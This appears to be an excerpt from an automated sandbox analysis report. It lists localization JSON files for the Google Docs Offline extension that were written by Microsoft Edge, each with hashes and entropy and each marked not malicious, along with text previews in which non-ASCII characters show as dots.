                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1333
                                                                                                                                                                                    Entropy (8bit):4.686760246306605
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                    MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                    SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                    SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                    SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1263
                                                                                                                                                                                    Entropy (8bit):4.861856182762435
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                    MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                    SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                    SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                    SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1074
                                                                                                                                                                                    Entropy (8bit):5.062722522759407
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                    MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                    SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                    SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                    SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):879
                                                                                                                                                                                    Entropy (8bit):5.7905809868505544
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                    MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                    SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                    SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                    SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                    Entropy (8bit):4.50367724745418
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                    MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                    SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                    SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                    SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):843
                                                                                                                                                                                    Entropy (8bit):5.76581227215314
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                    MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                    SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                    SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                    SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                    Entropy (8bit):4.65963951143349
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11406
                                                                                                                                                                                    Entropy (8bit):5.745845607168024
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                    MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                    SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                    SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                    SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
